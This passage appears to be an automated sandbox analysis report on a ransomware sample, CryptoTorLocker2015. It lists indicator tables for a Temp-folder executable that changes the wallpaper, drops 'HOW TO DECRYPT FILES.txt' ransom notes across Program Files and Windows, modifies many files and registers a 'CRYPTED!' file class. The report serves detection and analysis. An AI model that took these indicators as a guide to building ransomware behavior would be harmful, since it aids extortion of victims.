| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ehkpbejmpbejmobe.bmp" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Common Files\System\ado\en-US\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\System\msadc\it-IT\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15169_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\PREVIEW.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15172_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseover.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01744_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Hearts\it-IT\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Mahjong\es-ES\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\Help\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Australia\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\include\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Mahjong\fr-FR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21322_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15156_.GIF | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Globalization.Extensions\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Providers\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.tpm.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9770b2fccce9196c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\msil_system.web.abstractions_31bf3856ad364e35_6.1.7601.17514_none_070192411bec34df\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-p..noverride.resources_31bf3856ad364e35_6.1.7600.16385_en-us_fcbdc63a822b09a5\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..migration.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_196bac53955bfaba\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-w..figwizard.resources_31bf3856ad364e35_6.1.7600.16385_it-it_7c0c8fb2a1b286f0\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\16_9-frame-overlay.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-wab-app_31bf3856ad364e35_6.1.7601.17514_none_a0cf62efee3228a3\verisign.bmp | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-wmpdui.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_78142c772a77958d\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft.windows.h..iverclass.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_aa989395a42b4c87\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_modules.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-r..xwddmdriver-wow64-c_31bf3856ad364e35_6.1.7601.17514_none_0f4e7261c2d97332\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-aero.resources_31bf3856ad364e35_6.1.7600.16385_es-es_9606d11873dc4c26\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-f..rant-heap.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_9655fc11af8d5019\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\square_h.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-r..l-cmdline.resources_31bf3856ad364e35_6.1.7600.16385_it-it_603f5692664da8c3\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-rastapi_31bf3856ad364e35_6.1.7600.16385_none_6ad91c00938e07eb\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-runonce.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_13fb90a2252bc889\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-media-mp3acm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_872be93eaa9f6a40\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_253e8c58002c48e1\icon.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\b204998e0b878089f7fd625612a35dfa\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-scrnsave.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_d60e0225bb629349\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-v..cprovider.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b0d9ff43083875e3\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-w..cture-bsp.resources_31bf3856ad364e35_6.1.7600.16385_de-de_80e558338e88b98f\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_wiaca00d.inf.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_10a649f27418442a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-bits-client.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_90a36239772dc5bf\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_types.ps1xml.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnca00y.inf_31bf3856ad364e35_6.1.7600.16385_none_e98f89fc1f2764a5\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_pt-br_4ac5907e29b67fa6\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_es-es_190509f817d75392\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-time-tool_31bf3856ad364e35_6.1.7600.16385_none_48fe0cfd559f80ad\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..emsupport.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a2422857a3dd5d28\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-rasapi.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ff2b168c11b3c27d\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..ptdebugui.resources_31bf3856ad364e35_11.2.9600.16428_en-us_782230ccf6f5f372\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-s..dlinetool.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_34a3f19594e7841a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-c..ltdel-adm.resources_31bf3856ad364e35_6.1.7600.16385_it-it_2823e1c0b9b01d77\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-n..35cdfcomp.resources_31bf3856ad364e35_6.1.7600.16385_es-es_ab23e226ad0c1160\SqlPersistenceProviderSchema.sql | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ndis-packetcapture_31bf3856ad364e35_6.1.7600.16385_none_42f0a15ff0f021a4\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\Circle_VideoInset.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Notify.wav | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\wow64_microsoft-windows-m..onwizardapplication_31bf3856ad364e35_6.1.7601.17514_none_22f5c6aadf559287\System.gif | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework\v3.0\Windows Workflow Foundation\SQL\it\SqlPersistenceService_Logic.sql | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnkm005.inf.resources_31bf3856ad364e35_6.1.7600.16385_es-es_52c993fdf185260a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_server-help-chm.file_srv.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4d89a23c740117ff\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_wpf-presentationframework.aero_31bf3856ad364e35_6.1.7600.16385_none_8e78b13e22425483\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\Boot\EFI\el-GR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\drag.png | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-searchfolder_31bf3856ad364e35_6.1.7601.17514_none_f8963f65dfec0ddb\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_sisraid2.inf_31bf3856ad364e35_6.1.7600.16385_none_832517589fa2d115\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-s..gtool-app.resources_31bf3856ad364e35_6.1.7600.16385_it-it_92465f8164122a23\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-p..opeerpnrp.resources_31bf3856ad364e35_6.1.7600.16385_es-es_011040f9ee765307\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_sv-se_e71f7ad1e149c2c4\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-i..-wow64-setupdll000a_31bf3856ad364e35_6.1.7600.16385_none_4826d6bacb68758d\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\wow64_microsoft-windows-p..noverride.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_2b8e0e713f710905\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_fundisc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_351cf3c12f2ea766\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_netfx-aspnet_webadmin_appcfg_res_b03f5f7f11d50a3a_6.1.7600.16385_none_237ab8d1f339c9c5\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_wpf-presentationbuildtasks_31bf3856ad364e35_6.1.7601.17514_none_5214a8c9abbda14c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_nete1e3e.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_f9478fef83a24677\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-msmq-runtime_31bf3856ad364e35_6.1.7601.17514_none_a2e93e679472903c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-onex.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b8b6d9485b260e76\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-s..lprovider.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5a54be1f8ade6a36\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015!\ = "PRPASCBHJSZLMOM" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\ = "CRYPTED!" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015! | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe,0" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
